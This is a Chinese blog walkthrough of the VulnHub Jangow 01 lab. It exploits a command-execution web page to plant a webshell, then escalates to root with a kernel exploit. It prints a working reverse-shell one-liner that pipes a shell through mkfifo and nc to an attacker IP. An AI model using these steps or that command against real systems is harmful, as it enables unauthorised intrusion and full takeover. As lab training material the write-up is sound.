VulnHub-Jangow-01-1.0.1打靶记录

知识点

  • NMAP参数
    • -sV 获取系统信息
    • -sT TCP扫描可能会留下日志记录
    • -sC 使用默认脚本(在-A模式下不需要)
    • -p1-xxx 扫描端口号 -p- ==>等价于 -p1-65535 不设置端口就扫描默认端口
    • -Pn 绕过禁用ping
    • -A 进攻性扫描也会运行默认脚本)
  • arp-scan arp利用arp地址解析协议探测扫描
    • -I 大写i 用以指定用来扫描的网卡 如果未指定会使用网卡序号最低的一个 也就是eth0但是如果指定 那么指定的网卡必须支持ARP
    • -l 小写L 表示从网络接口的ip和掩码生成列表进行扫描

准备工作

由于下载的ova文件默认是仅主机模式,不方便使用,这里用vm打开后改为,nat模式,当然如果要使用仅主机模式,只要保持,可以和目标通信即可。

由于镜像保护原因,直接下载的可能遇到无法获得ip的情况,可通过一下步骤获取ip

  1. 在下面这个页面按e

在这里插入图片描述

  1. 找到这个位置 将ro更改为 rw single init=/bin/bash,如图所示

  2. 在这里插入图片描述

    在这里插入图片描述

  3. 然后按ctr+x进入命令行页面

  4. 查看网卡名称
    在这里插入图片描述

  5. 进入网络配置面板

    在这里插入图片描述

  6. 在这里插入图片描述

  7. 将该文件的网卡名称改为 ens33 在这里插入图片描述

  8. 重启网卡即可获取ip

  9. 在这里插入图片描述

  10. 然后直接重启虚拟机即可进入测试

  11. 在这里插入图片描述

信息收集

  1. 目标发现

在这里插入图片描述

发现目标,由于其他三个是环境中的所以锁定这个(这里有点脱裤子放*了,因为前面重启服务的时候已经看到了,但是如果这个环境没有问题,是需要这样进行目标发现的。)

  1. 资产扫描

    nmap -sV -Pn -A -p- 192.168.245.141
    

    这里用-p-是全端口扫描,虽然慢点,但是这样可以保证资产不遗漏,如果靶机改了端口,用常用端口无法扫描到。

  2. 在这里插入图片描述

    这里扫描发现有一个http服务,和ftp服务,ftp需要账号密码,转向http服务

  3. http测试

在这里插入图片描述

  1. 点击site进入网站首页

在这里插入图片描述

  1. 翻看发现这个页面存在命令执行。

在这里插入图片描述

7.在这里插入图片描述 只需要在参数后门加要执行的命令

  1. webshell写入

    在这里插入图片描述

    注意那么美元符前面要加反斜杠,否则在执行的时候,命令行会把他当做一个变量,无法写入到文件

  2. 使用ls命令查看目标已写入成功,用蚁剑连接

  3. 在这里插入图片描述

    这个文件中有数据库信息,本打算利用数据库提权,但是很遗憾无法连接,按理说用webshell连接是本地连接但是连接不上。

  4. 寻找其他的方法,本想将权限返回到msf或者cs上进行下一步自动发测试但是多种方式测试均无法成功上线,可能是防火墙原因也有可能是靶场的linux环境不支持我测试的后门程序。

  5. 这里使用命令 uname -a 可以发现 系统内核版本信息,使用searchsploit进行搜索,结果如下
    在这里插入图片描述

  6. 经测试只有45010.c这个文件可以成功反弹,其他均失败

  7. 将shell反弹到nc,因为需要接收exp执行后返回的回话。
    rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.245.128 443 >/tmp/f 更换ip即可
    nc -lvnp 443 端口不能换,其他端口没办法反弹。

  8. 在这里插入图片描述

  9. 执行 exp ./exp 如果执行不成功 添加执行权限 chmod +x exp 后再执行

  10. 在这里插入图片描述

38195)]
17. 执行 exp ./exp 如果执行不成功 添加执行权限 chmod +x exp 后再执行
18. [外链图片转存中…(img-C4kFovwJ-1661052138195)]

获得了root权限,使用passwd即可更改密码,可以任意方法维持权限。

posted @ 2022-08-21 11:32  苦蛇  阅读(5)  评论(0编辑  收藏  举报  来源